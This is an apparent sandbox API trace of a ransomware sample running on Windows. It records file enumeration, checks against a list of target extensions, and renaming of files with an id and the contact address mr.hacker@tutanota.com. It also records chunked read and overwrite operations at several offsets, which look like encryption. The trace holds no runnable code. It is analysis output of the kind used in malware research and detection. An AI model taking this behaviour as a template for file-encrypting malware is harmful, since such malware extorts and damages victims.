1 [0034.934] lstrlenW (lpString=".rar") returned 4 [0034.934] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0034.934] lstrlenW (lpString=".bz2") returned 4 [0034.934] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0034.934] lstrlenW (lpString=".7z") returned 3 [0034.934] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0034.934] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.934] lstrlenW (lpString=".dbf") returned 4 [0034.934] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0034.934] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.934] lstrlenW (lpString=".1cd") returned 4 [0034.935] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0034.935] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.935] lstrlenW (lpString=".jpg") returned 4 [0034.935] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0034.935] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.935] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.935] lstrlenW (lpString=".doc") returned 4 [0034.935] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0034.935] lstrlenW (lpString=".docx") returned 5 [0034.935] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0034.935] lstrlenW (lpString=".pdf") returned 4 [0034.935] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0034.935] lstrlenW (lpString=".xls") returned 4 [0034.935] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0034.935] lstrlenW (lpString=".xlsx") returned 5 [0034.935] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0034.935] lstrlenW (lpString=".ppt") returned 4 [0034.935] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0034.935] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.935] lstrlenW (lpString=".zip") returned 4 [0034.935] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0034.935] lstrlenW (lpString=".rar") returned 4 [0034.935] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0034.935] lstrlenW (lpString=".bz2") returned 4 [0034.935] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0034.935] lstrlenW (lpString=".7z") returned 3 [0034.935] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0034.935] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.935] lstrlenW (lpString=".dbf") returned 4 [0034.935] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0034.935] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.935] lstrlenW (lpString=".1cd") returned 4 [0034.935] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0034.936] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.936] lstrlenW (lpString=".jpg") returned 4 [0034.936] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0034.936] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0034.936] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0034.936] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.936] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=94800) returned 1 [0034.936] CloseHandle (hObject=0x19c) returned 1 [0034.936] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0034.936] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.936] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0034.936] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0034.936] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0034.936] lstrlenW (lpString=".doc") returned 4 [0034.936] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0034.936] lstrlenW (lpString=".docx") returned 5 [0034.936] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0034.937] lstrlenW (lpString=".pdf") returned 4 [0034.937] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0034.937] lstrlenW (lpString=".xls") returned 4 [0034.937] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0034.937] lstrlenW (lpString=".xlsx") returned 5 [0034.937] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0034.937] lstrlenW (lpString=".ppt") returned 4 [0034.937] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0034.937] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0034.937] lstrlenW (lpString=".zip") returned 4 [0034.937] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0034.937] lstrlenW (lpString=".rar") returned 4 [0034.937] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0034.937] lstrlenW (lpString=".bz2") returned 4 [0034.937] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0034.937] lstrlenW (lpString=".7z") returned 3 [0034.937] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0034.938] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0035.379] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0035.379] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0035.379] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.380] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0035.380] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.380] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.388] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.389] ReadFile (in: hFile=0x1b0, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.401] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.401] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.401] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.574] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.574] WriteFile (in: hFile=0x1b0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc010e, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc010e, lpOverlapped=0x0) returned 1 [0035.591] SetEndOfFile (hFile=0x1b0) returned 1 [0035.591] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0035.595] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.595] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.596] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.596] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.958] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.958] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.961] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0036.084] CloseHandle (hObject=0x1b0) returned 1 [0036.431] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0036.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.432] lstrlenW (lpString=".doc") returned 4 [0036.432] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.432] lstrlenW (lpString=".docx") returned 5 [0036.432] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0036.432] lstrlenW (lpString=".pdf") returned 4 [0036.432] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.432] lstrlenW (lpString=".xls") returned 4 [0036.432] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.432] lstrlenW (lpString=".xlsx") returned 5 [0036.432] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.432] lstrlenW (lpString=".ppt") returned 4 [0036.432] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.432] lstrlenW (lpString=".zip") returned 4 [0036.432] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.432] lstrlenW (lpString=".rar") returned 4 [0036.432] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0036.432] lstrlenW (lpString=".bz2") returned 4 [0036.432] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.432] lstrlenW (lpString=".7z") returned 3 [0036.432] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.432] lstrlenW (lpString=".dbf") returned 4 [0036.432] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.432] lstrlenW (lpString=".1cd") returned 4 [0036.432] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.433] lstrlenW (lpString=".jpg") returned 4 [0036.433] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.433] lstrlenW (lpString=".doc") returned 4 [0036.433] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.433] lstrlenW (lpString=".docx") returned 5 [0036.433] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0036.433] lstrlenW (lpString=".pdf") returned 4 [0036.433] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.433] lstrlenW (lpString=".xls") returned 4 [0036.433] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.433] lstrlenW (lpString=".xlsx") returned 5 [0036.433] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.433] lstrlenW (lpString=".ppt") returned 4 [0036.433] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.433] lstrlenW (lpString=".zip") returned 4 [0036.433] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.433] lstrlenW (lpString=".rar") returned 4 [0036.433] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0036.433] lstrlenW (lpString=".bz2") returned 4 [0036.433] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.433] lstrlenW (lpString=".7z") returned 3 [0036.433] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.433] lstrlenW (lpString=".dbf") returned 4 [0036.433] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.433] lstrlenW (lpString=".1cd") returned 4 [0036.433] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0036.433] lstrlenW (lpString=".jpg") returned 4 [0036.433] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.434] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0036.434] lstrlenW (lpString="PubLR.cab") returned 9 [0036.434] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0036.434] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=9958388) returned 1 [0036.434] CloseHandle (hObject=0x1b0) returned 1 [0036.434] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab")) returned 0x2020 [0036.434] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.434] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0036.435] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0036.435] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0036.435] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.435] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.440] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.440] ReadFile (in: hFile=0x1b0, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.718] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0036.719] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.719] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.954] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.954] WriteFile (in: hFile=0x1b0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0036.973] SetEndOfFile (hFile=0x1b0) returned 1 [0036.973] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fe70b8 [0036.977] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.977] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fe70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70b8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.978] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.978] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fe70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70b8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.982] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.982] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fe70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70b8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.986] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70b8 | out: hHeap=0x5d0000) returned 1 [0036.986] CloseHandle (hObject=0x1b0) returned 1 [0040.313] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0040.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.314] lstrlenW (lpString=".doc") returned 4 [0040.314] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.314] lstrlenW (lpString=".docx") returned 5 [0040.314] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0040.314] lstrlenW (lpString=".pdf") returned 4 [0040.314] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.314] lstrlenW (lpString=".xls") returned 4 [0040.314] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.314] lstrlenW (lpString=".xlsx") returned 5 [0040.314] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0040.314] lstrlenW (lpString=".ppt") returned 4 [0040.314] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.314] lstrlenW (lpString=".zip") returned 4 [0040.314] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.314] lstrlenW (lpString=".rar") returned 4 [0040.314] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.314] lstrlenW (lpString=".bz2") returned 4 [0040.314] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.314] lstrlenW (lpString=".7z") returned 3 [0040.314] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.314] lstrlenW (lpString=".dbf") returned 4 [0040.314] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.314] lstrlenW (lpString=".1cd") returned 4 [0040.314] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.314] lstrlenW (lpString=".jpg") returned 4 [0040.314] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.314] lstrlenW (lpString=".doc") returned 4 [0040.315] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.315] lstrlenW (lpString=".docx") returned 5 [0040.315] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0040.315] lstrlenW (lpString=".pdf") returned 4 [0040.315] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.315] lstrlenW (lpString=".xls") returned 4 [0040.315] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.315] lstrlenW (lpString=".xlsx") returned 5 [0040.315] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0040.315] lstrlenW (lpString=".ppt") returned 4 [0040.315] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.315] lstrlenW (lpString=".zip") returned 4 [0040.315] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.315] lstrlenW (lpString=".rar") returned 4 [0040.315] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.315] lstrlenW (lpString=".bz2") returned 4 [0040.315] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.315] lstrlenW (lpString=".7z") returned 3 [0040.315] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.315] lstrlenW (lpString=".dbf") returned 4 [0040.315] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.315] lstrlenW (lpString=".1cd") returned 4 [0040.315] 